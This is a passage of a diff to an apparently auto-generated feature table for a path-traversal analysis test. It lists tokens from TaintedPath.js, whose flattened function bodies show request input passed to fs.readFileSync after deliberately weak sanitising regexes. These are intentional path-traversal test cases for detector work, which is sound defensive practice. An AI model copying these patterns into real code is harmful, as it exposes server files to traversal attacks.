/^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:29:190:36 | "prefix" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:29:190:36 | "prefix" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:29:190:36 | "prefix" | stringConcatenatedWith | -endpoint- pathModule.normalize().replace() | | autogenerated/TaintedPath/TaintedPath.js:190:29:190:94 | "prefix ... +/, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:190:29:190:94 | "prefix ... +/, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:190:29:190:94 | "prefix ... +/, '') | calleeImports | fs | @@ -6528,6 +65379,47 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:190:29:190:94 | "prefix ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:190:29:190:94 | "prefix ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:190:29:190:94 | "prefix ... +/, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:49 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:49 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:49 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:49 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:49 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:59 | pathModule.normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:59 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:59 | pathModule.normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:59 | pathModule.normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:59 | pathModule.normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:65 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:73 | pathMod ... replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:73 | pathMod ... replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:73 | pathMod ... replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:73 | pathMod ... replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:73 | pathMod ... replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | exceptional return of pathMod ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | exceptional return of pathMod ... +/, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | exceptional return of pathMod ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | exceptional return of pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | exceptional return of pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | pathMod ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | pathMod ... +/, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | pathMod ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:190:40:190:94 | pathMod ... +/, '') | stringConcatenatedWith | 'prefix' -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:190:51:190:59 | normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:51:190:59 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:51:190:59 | normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:51:190:59 | normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:51:190:59 | normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:190:61:190:64 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/TaintedPath.js:190:61:190:64 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:190:61:190:64 | path | calleeImports | path | @@ -6537,6 +65429,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:190:61:190:64 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:190:61:190:64 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:190:61:190:64 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:190:67:190:73 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:67:190:73 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:190:67:190:73 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:190:67:190:73 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:190:67:190:73 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:190:75:190:89 | /(\\.\\.[\\/\\\\])+/ | CalleeFlexibleAccessPath | pathModule.normalize().replace | | autogenerated/TaintedPath/TaintedPath.js:190:75:190:89 | /(\\.\\.[\\/\\\\])+/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:190:75:190:89 | /(\\.\\.[\\/\\\\])+/ | calleeImports | path | @@ -6553,6 +65450,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:190:92:190:93 | '' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | | autogenerated/TaintedPath/TaintedPath.js:190:92:190:93 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:190:92:190:93 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:3:191:92 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:7:191:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:7:191:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:7:191:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:191:7:191:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:191:7:191:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:191:13:191:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix 